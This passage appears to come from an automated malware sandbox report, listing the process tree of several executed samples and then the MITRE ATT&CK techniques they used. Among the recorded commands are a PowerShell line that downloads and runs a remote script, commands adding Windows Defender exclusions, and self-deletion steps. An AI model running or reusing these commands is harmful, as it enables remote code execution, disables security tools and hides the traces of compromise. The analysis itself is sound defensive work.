    "C:\Windows\System32\cmd.exe" /c taskkill /im "lower.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX4\lower.exe" & exit
    3⤵
    PID:8784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "lower.exe" /f
      4⤵
      Kills process with taskkill
      PID:7628
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 10100 -s 1472
    3⤵
    PID:7200
- C:\Users\Admin\AppData\Local\Temp\RarSFX4\ss29.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX4\ss29.exe"
  2⤵
  PID:6900

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:7004

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:8860
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:5760
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 600
    3⤵
    - Program crash
    PID:8228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5760 -ip 5760
1⤵
PID:8948

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:9572
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'"
  2⤵
  PID:9308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'
    3⤵
    PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 10100 -ip 10100
1⤵
PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 10100 -ip 10100
1⤵
PID:9136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10100 -ip 10100
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10100 -ip 10100
1⤵
PID:10020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 10100 -ip 10100
1⤵
PID:10072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 10100 -ip 10100
1⤵
PID:9744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10100 -ip 10100
1⤵
PID:9840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 10100 -ip 10100
1⤵
PID:6800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 10100 -ip 10100
1⤵
PID:9824

C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe
C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe --Task
1⤵
- Suspicious use of SetThreadContext
PID:9068
- C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe
  C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c\stpoeoeiej.exe --Task
  2⤵
  PID:1064

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:9144

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:8312

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:9964

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:8608

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe"
1⤵
- Checks computer location settings
PID:6128
- C:\Users\Admin\AppData\Local\Temp\RarSFX5\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\Crack.exe"
  2⤵
  - Checks computer location settings
  PID:8480
- - C:\Users\Admin\AppData\Local\Temp\RarSFX5\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX5\Crack.exe" -h
    3⤵
    PID:7172
- C:\Users\Admin\AppData\Local\Temp\RarSFX5\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\brg.exe"
  2⤵
  - Suspicious use of SetThreadContext
  PID:5876
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:6808
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
    3⤵
    PID:9592
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
    3⤵
    PID:2948
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:1180
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
    3⤵
    PID:9524
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:6784
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:7504
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
    3⤵
    PID:9784
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:4988
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    PID:6336
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:10172
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
    3⤵
    PID:4332
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:8568
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:7040
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
    3⤵
    PID:7412
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:6564
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
    3⤵
    PID:4776
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:9156
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    PID:9276
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:8632
- C:\Users\Admin\AppData\Local\Temp\RarSFX5\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\sqlcmd.exe"
  2⤵
  PID:4932
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    PID:7060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      PID:6792
- - C:\ProgramData\5F82.tmp.exe
    "C:\ProgramData\5F82.tmp.exe"
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\sqlcmd.exe" >> NUL
    3⤵
    PID:10220
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:9680
- C:\Users\Admin\AppData\Local\Temp\RarSFX5\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\KiffAppE2.exe"
  2⤵
  PID:7808
- C:\Users\Admin\AppData\Local\Temp\RarSFX5\lower.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\lower.exe"
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7036 -s 452
    3⤵
    PID:5052

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:7068
- C:\Users\Admin\AppData\Local\Temp\is-3B453.tmp\is-K8DJL.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-3B453.tmp\is-K8DJL.tmp" /SL4 $C08CE "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:9120

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:7848
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:6324
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 600
    3⤵
    PID:9580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6324 -ip 6324
1⤵
PID:7264

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:8564
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'"
  2⤵
  PID:6924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'
    3⤵
    PID:8588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7036 -ip 7036
1⤵
PID:10108

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3ee6055 /state1:0x41c64e6d
1⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:7172

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:9004

C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe
C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe
1⤵
PID:9904

C:\Users\Admin\AppData\Roaming\uciugwj
C:\Users\Admin\AppData\Roaming\uciugwj
1⤵
PID:9328

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery